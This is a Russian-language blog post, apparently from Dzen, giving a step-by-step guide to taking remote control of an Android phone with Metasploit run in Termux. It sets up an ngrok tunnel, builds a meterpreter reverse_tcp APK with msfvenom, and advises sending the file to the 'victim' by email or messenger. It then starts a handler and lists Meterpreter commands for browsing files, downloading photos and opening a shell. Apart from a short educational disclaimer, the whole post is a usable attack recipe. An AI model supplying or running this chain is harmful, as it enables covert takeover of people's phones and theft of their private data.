Добавить в корзинуПозвонить
Найти в Дзене
Обо всем

Metasploit эмуляция удаленного проникновения на андроид устройства

🎯План действий 1. Установка Metasploit в Termux. 3. Создание полезной нагрузки (payload) для Android. 4. Туннелирование соединения через интернет. 🛠️Установка Metasploit в Termux Выполните команды для установки Metasploit: pkg update && pkg upgrade pkg install wget curl git ruby openssh wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh Запуск msfconsole 🌍Установка и настройка ngrok 💻Скачайте и установите ngrok: pkg install wget unzip wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip Зарегистрируйтесь на ngrok и получите токен аутентификации. https://ngrok.com/ Авторизуйтесь в ngrok: ./ngrok authtoken <ваш_токен> Запустите туннелирование порта ./ngrok tcp 4444 tcp://0.tcp.ngrok.io:12345 Сохраните его, так как он потребуется для создания payload.📝 📱Создание Android Payload (вредоносного APK) 💣В Metasploit выполните команду для создания APK-файла: ms

🎯План действий

1. Установка Metasploit в Termux.

3. Создание полезной нагрузки (payload) для Android.

4. Туннелирование соединения через интернет.

🛠️Установка Metasploit в Termux

Выполните команды для установки Metasploit:

pkg update && pkg upgrade
pkg install wget curl git ruby openssh
wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh
chmod +x metasploit.sh
./metasploit.sh

Запуск

msfconsole

🌍Установка и настройка ngrok

💻Скачайте и установите ngrok:

pkg install wget unzip
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
unzip ngrok-stable-linux-arm.zip

Зарегистрируйтесь на ngrok и получите токен аутентификации.

https://ngrok.com/

Авторизуйтесь в ngrok:

./ngrok authtoken <ваш_токен>

Запустите туннелирование порта

./ngrok tcp 4444
tcp://0.tcp.ngrok.io:12345

Сохраните его, так как он потребуется для создания payload.📝

📱Создание Android Payload (вредоносного APK)

💣В Metasploit выполните команду для создания APK-файла:

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=12345 R > payload.apk

⚠️Замените 0.tcp.ngrok.io и 12345 на соответствующие значения из ngrok.

Отправьте сгенерированный payload.apk на тестируемое устройство (например, через e-mail или мессенджер). Важно: цель должна вручную установить и запустить приложение.

🎯Запуск и подключение Metasploit к Payload

В Metasploit запустите консоль и настройте листенер для ожидания подключения:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0 # При использовании ngrok оставляем 0.0.0.0
set LPORT 4444
exploit

Почему LHOST = 0.0.0.0?

Это позволяет Metasploit принимать подключения на любом интерфейсе. Туннель ngrok будет перенаправлять трафик с публичного URL на ваш локальный порт 4444.

📲После того как жертва установит и откроет APK-файл, вы увидите подключение с помощью Meterpreter.

🤖Примеры команд Meterpreter

📂Проверка списка файлов на устройстве:

ls

📥Скачивание файлов с устройства

download /sdcard/DCIM/photo.jpg

💻Запуск команды на устройстве

shell

⚠️Важно:

Это руководство предназначено исключительно для обучающих целей. Любое несанкционированное использование Metasploit или вредоносного ПО против других устройств является незаконным.

Некоторые антивирусы могут распознавать подобные APK-файлы как вредоносные, и установка будет заблокирована.